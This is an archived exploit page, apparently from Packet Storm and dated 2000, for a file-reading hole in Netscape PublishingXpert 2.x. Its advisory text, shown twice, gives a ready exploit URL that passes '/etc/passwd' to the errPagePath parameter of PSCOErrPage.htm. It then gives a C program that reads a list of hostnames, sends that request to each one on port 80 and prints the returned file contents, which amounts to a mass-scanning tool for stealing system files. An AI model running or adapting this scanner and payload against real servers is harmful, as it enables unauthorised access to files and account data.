what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ooo1.txt

ooo1.txt
Posted Apr 15, 2000
Authored by x00x00

Netscape PublishingXpert 2.* file-reading/dir-listing vuln in PSCOErrPage.htm - On SunOS 5.5.1 and 5.6 (possibly others), Netscape PublishingXpert 2.* can read any file on the system. Many large e-commerace sites are vulnerable to this. Exploit details included.

tags | exploit
systems | solaris
SHA-256 | f72d0de10aa960305471a7ffdf18974bf303879fb5b50370cc298b687d33dd75

ooo1.txt

Change Mirror Download
###########################ooo1.txt#####################
Netscape PublishingXpert 2.* file-reading/dir-listing vuln in
PSCOErrPage.htm
by \x00\x00
0s vuln: SunOS 5.6 and SunOS 5.5.1 ( others versions affected possibly )


discription:
PSCOErrPage.htm is a error handler message page, when theirs a server
error usually you will get fowarded to this along with
a url query like this:

/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fpsuser%2Fen%2Fcommon%2FPSCO_ErrPage.pat&errMsg=PUBSYS_
35202%3A++The+two+passwords+provided+do+not+match
%2F= / so we can make this a little bit more visible by changing the url to
be more clearly visible for us. Lets also remove that junk info "&errMsg="
and see what we have got...
/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/common/PSCO_ErrPage.pat
Yes, thats a fully specified filename, meaning we can input whatever we
want.
In our case lets say we wanted to snag /etc/passwd just request the
fallowing:

exploit:
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd


Alot of big e-commernce sites are vuln to this, but luckily scence the level
of the
cgi script dose not have root permisions, meaning your shadow file and other
root
files are safe.
, .
\ /
\ / , ,
\ / \ / o4/o6/2ooo
X o o X o o #ooo1
/ \ / \ by \x00\x00 of
/ \ ` ` awkwerd concepts
/ \ x00x00x00@hotmail.com
` `


###########################EOF#####################
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






/*

Netscape PublishingXpert 2.* file-reading/dir-listing
vuln in PSCOErrPage.htm by \x00\x00

0s vuln:
SunOS 5.6 and SunOS 5.5.1 (others versions affected possibly)


discription:
PSCOErrPage.htm is a error handler message page, when theirs
a server error usually you will get fowarded to this along
with a url query like this:

/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fpsuser%2Fen%2Fcommon%2FPSCO_ErrPage.pat&errMsg=PUBSY
S_35202%3A++The+two+passwords+provided+do+not+match
%2F= /

so we can make this a little bit more visible by changing
the url to be more clearly visible for us. Lets also remove
that junk info "&errMsg=" and see what we have got...

/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/common/PSCO_ErrPage.pat

Yes, thats a fully specified filename, meaning we can input
whatever we want. In our case lets say we wanted to snag
/etc/passwd just request the fallowing:

exploit:
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd

Alot of big e-commernce sites are vuln to this, but luckily
scence the level of the cgi script dose not have root
permisions, meaning your shadow file and other root files are safe.

Usage:
xpert <infile><outfile>

*/


#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}

main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;

char rmpMessage[]="GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;

nametocheck = gethostbyname (hosta);

(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;

alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);

if(FLAG == 1 && X==0){
write(outsocket,rmpMessage,strlen(rmpMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket);
}
return 0;
}
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close